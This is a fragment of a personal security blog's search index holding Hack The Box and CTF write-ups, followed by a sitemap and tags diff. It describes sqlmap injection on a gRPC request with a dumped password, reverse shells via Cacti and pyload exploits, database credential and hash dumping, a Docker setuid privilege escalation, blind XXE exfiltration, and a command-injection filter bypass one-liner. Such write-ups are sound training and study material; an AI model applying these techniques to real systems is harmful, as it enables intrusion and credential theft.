built-in operation\u0026#34; I saved the request in a file and fired up sqlmap\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 POST /invoke/SimpleApp.getInfo HTTP/1.1 Host: 127.0.0.1:41553 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json x-grpcui-csrf-token: ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY X-Requested-With: XMLHttpRequest Content-Length: 190 Origin: http://127.0.0.1:41553 Connection: close Referer: http://127.0.0.1:41553/ Cookie: wp-settings-1=libraryContent%3Dbrowse; _grpcui_csrf_token=ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {\u0026#34;metadata\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;token\u0026#34;,\u0026#34;value\u0026#34;:\u0026#34;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NjMyMTkzMX0.L624cRHm_TXyUSDTBU14H82b2DNq44JacxN9XfT1cKU\u0026#34;}],\u0026#34;data\u0026#34;:[{\u0026#34;id\u0026#34;:\u0026#34;1*\u0026#34;}]} I added * next to the id number to tell sqlmap to test that field . NOTE: if you dont do this sqlmap will run tests on the outer json only.\nHere are the tables and data of table accounts\n1 2 3 4 5 6 7 8 9 10 11 12 13 +----------+ | accounts | | messages | +----------+ +------------------------+----------+ | password | username | +------------------------+----------+ | admin | admin | | HereIsYourPassWord1431 | sau | +------------------------+----------+ We can login to ssh as the user sau. The we read user.txt\nI uploaded linpeas.sh to the target and ran it , I found out that there was a webserver listening on port 127.0.0.1:8000. To access it on our machine we can use a technique known as ssh port forwarding.\n1 2 3 4 5 Here is the command ssh -L 8000:localhost:8000 sau@10.10.11.214 It will map port 8000 on the server to port 8000 locally Visiting the url we find out it is a login page of pyload. Since we dont have login creds , I searched for exploits aganist pyload and luckily there is an unathenticated rce.\nI used this exploit to understand more on how i works , here.\nRunning the exploit we get are root :() and we can read root.txt.\nREFERENCES for gprc and other ways to expoit it:\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-1-c0059362c4b5\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-2-b1fd38f8cd88\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-4-f1c260bbb00a\n","date":"2023-06-09T17:22:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-pc/","title":"HTB PC"},{"content":"HTB monitortwo writeup categoty : web\ndifficulty : easy\nAs always we begin with a port scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-02 12:45 EAT Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 56.80% done; ETC: 12:46 (0:00:15 remaining) Nmap scan report for 10.10.11.211 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Login to Cacti Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.63 seconds As you can see there is a web interface , it is a login page and it utilizes something called cacti version 1.2.22\nUsing searchsploit :\nrunning the exploit, BOOM!! we get a reverse shell\nLooking around there is nothing really interesting , i ran linpeas and all i could find was a suid binary called capsh , you can check out how to exploit it here\nbut there was nothing in the root folder , turns out we were in a docker container that ran the webserver.The file that caught my attention was entrypoint.sh in the root folder.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 #!/bin/bash set -ex wait-for-it db:3306 -t 300 -- echo \u0026#34;database is connected\u0026#34; if [[ ! $(mysql --host=db --user=root --password=root cacti -e \u0026#34;show tables\u0026#34;) =~ \u0026#34;automation_devices\u0026#34; ]]; then mysql --host=db --user=root --password=root cacti \u0026lt; /var/www/html/cacti.sql mysql --host=db --user=root --password=root cacti -e \u0026#34;UPDATE user_auth SET must_change_password=\u0026#39;\u0026#39; WHERE username = \u0026#39;admin\u0026#39;\u0026#34; mysql --host=db --user=root --password=root cacti -e \u0026#34;SET GLOBAL time_zone = \u0026#39;UTC\u0026#39;\u0026#34; fi chown www-data:www-data -R /var/www/html # first arg is `-f` or `--some-option` if [ \u0026#34;${1#-}\u0026#34; != \u0026#34;$1\u0026#34; ]; then set -- apache2-foreground \u0026#34;$@\u0026#34; fi exec \u0026#34;$@\u0026#34; As you can see , we can use that format to run mysql statements.I used the following to dump users in the user_auth table.\n1 mysql --host=db --user=root --password=root cacti -e \u0026#34;SELECT * FROM user_auth\u0026#34; We get that there are 3 user accounts, admin, guest and marcus and their password hashes.I saved the hashes to a file and let john-the-ripper do its thing.\nI tried logging in the webpage but i got access denied and then tried ssh login as marcus, BOOM!! i am now marcus.\nWe can read the user.txt in the home folder\nI tried running linpeas again but still got nothing , also checked suid binaries but still nothing , at this point i did not know what to do.\nI got a hint that there was a docker vulnerability that resulted in privilledge escalation , you can read more and get the exploit here CVE-2021-41091\nFor this exploit to work you will utilize the capsh privesc we had discovered earlier in the reverse shell to set the \u0026ldquo;chmod u+s bash\u0026rdquo; .\nthen we execute the bash binary above as the in the marcus ssh session, BOOM!! root baby!!\nGoodbye ;)\n","date":"2023-06-02T16:31:02+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-monitortwo/","title":"HTB Monitortwo"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T13:03:23+03:00","permalink":"https://f0rk3b0mb.github.io/p/bic-winter-con-2023/","title":"Bic winter con 2023"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T12:59:47+03:00","image":"https://f0rk3b0mb.github.io/cover/ca-logo-2023.webp","permalink":"https://f0rk3b0mb.github.io/p/htb-cyberapocalypse-2023/","title":"htb cyberapocalypse 2023"},{"content":"xee1 category: web\nsolution From the title you can tell this is a classic xxe challenge , when you capture the login request in burp repeater you will realize that the username is echoed out , so we have to make sure the output of our xxe payload is reflected in the page through the user name field.\nI crafted a payload to read /flag.txt , we also need to pass it through a php filter , we get the flag in base64 format\nxee2 category: web\nsolution This challenge is a subsequent of xxe2 but required a more complex approach, this time we have to receive the flag remotely since our user input is not being reflaected in the site , this is known as blind xxe . You can read more about it here\nso after some research i created thhis payload that reads the /flag.txt and sends it to a ngrok endpoint, ps we also have to pass read the flag through a php filter\nI get a hit and we can decode the flag from base64 as shown below\nBing category: web\nsolution This was a little complicated , i saw it as more of a bash jail than a web challenge.\nBasically you wegiven a simple site with page that would serve the flag, there was clearly command injection , cince you could run the i command. There was also a poor attempt at a regex filter at the frontend so this challnge could only be solved using burp.\nfile reading commands like cat were blocked also spaces , so you had to try any command you knew to read a file. Heres the solution:\n\u0026lsquo;head$IFS/fl??.txt|rev\u0026rsquo;\nwithout the rev the page will not display there may be a flag filter , so we reverse it\n","date":"2023-05-21T12:44:03+03:00","image":"https://f0rk3b0mb.github.io/cover/deadsec.jpeg","permalink":"https://f0rk3b0mb.github.io/p/deadsec-2023/","title":"Deadsec 2023"}] \ No newline at end of file diff --git a/sitemap.xml b/sitemap.xml index d07edb7..3ddd870 100644 --- a/sitemap.xml +++ b/sitemap.xml @@ -2,19 +2,25 @@ - https://f0rk3b0mb.github.io/p/bsidesnrb2024/ - 2024-10-26T17:13:14+03:00 - https://f0rk3b0mb.github.io/categories/ - 2024-10-26T17:13:14+03:00 - - https://f0rk3b0mb.github.io/categories/writeups/ - 2024-10-26T17:13:14+03:00 + 2024-11-08T14:33:30+03:00 https://f0rk3b0mb.github.io/ - 2024-10-26T17:13:14+03:00 + 2024-11-08T14:33:30+03:00 + + https://f0rk3b0mb.github.io/p/goad-light/ + 2024-11-08T14:33:30+03:00 + + https://f0rk3b0mb.github.io/categories/labs/ + 2024-11-08T14:33:30+03:00 https://f0rk3b0mb.github.io/post/ + 2024-11-08T14:33:30+03:00 + + https://f0rk3b0mb.github.io/p/bsidesnrb2024/ + 2024-10-26T17:13:14+03:00 + + https://f0rk3b0mb.github.io/categories/writeups/ 2024-10-26T17:13:14+03:00 https://f0rk3b0mb.github.io/categories/reads/ diff --git a/tags/index.html b/tags/index.html index 0a29802..a367539 100644 --- a/tags/index.html +++ b/tags/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs